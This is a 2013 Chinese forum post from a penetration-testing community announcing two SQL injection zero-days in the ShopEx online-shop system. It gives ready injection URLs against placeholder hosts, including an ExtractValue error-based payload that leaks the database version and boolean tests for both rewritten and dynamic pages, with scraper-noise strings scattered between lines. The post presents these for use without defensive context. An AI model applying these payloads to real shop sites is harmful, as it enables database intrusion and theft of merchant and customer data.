中国网络渗透测试联盟
标题:
shopex通杀注入0day漏洞两处
[打印本页]
作者:
admin
时间:
2013-2-19 08:31
标题:
shopex通杀注入0day漏洞两处
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
R$ B/ \- t4 P3 {" D! {# H8 ?
( r: [( J' R8 ~9 u7 ~
好吧,我扯远了~~
$ @) M+ j9 L1 o( p3 C" J
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
; a; ]+ F" E/ h. t# @/ \; a
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
7 f1 G! |! N9 L0 ~. o# ?; O' s
" c( H* w2 o& h( o4 S
http://www.x.cn/index.php?comment-822
′/**/and/**/’1′=’1-ask-commentlist.html
- I4 c7 I9 v1 P, B+ r" a' \# N
# h" b D; t; L+ K, ?
http://www.x.com/comment-8967
′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
% v$ r5 N7 \( D% `' e- R
& N( G" `" T( N3 }# P: m' |
http://www.x.cn/index.php?comment-822
′/**/and/**/’1′=’1-ask-commentlist.html
* B' h4 l/ G! e3 Y6 e- |
, C1 P+ q* k, w. C% P6 r
http://demo.x.com.cn/485/index.php?comment-190
′/**/and/**/’1′=’1-ask-commentlist.html
+ X4 ]6 c t8 `- W- u6 n8 N
# G* o, P2 X% s; y% M6 o
* N* _! g' e6 i& q Y
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
^9 R+ V2 R- z! c( Q# j
如何注入就不多说了,10多年的东西了…不会也会了…
, l2 p2 ?( h! e6 `' k
5 V3 P2 W9 t! x! F5 p# A( V6 Y( a, } F
- f! }+ K6 @2 W7 G
, V# F3 @6 Y- |0 l$ h: m K4 D
' R) F1 K5 M9 ^0 Y, e8 ?
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2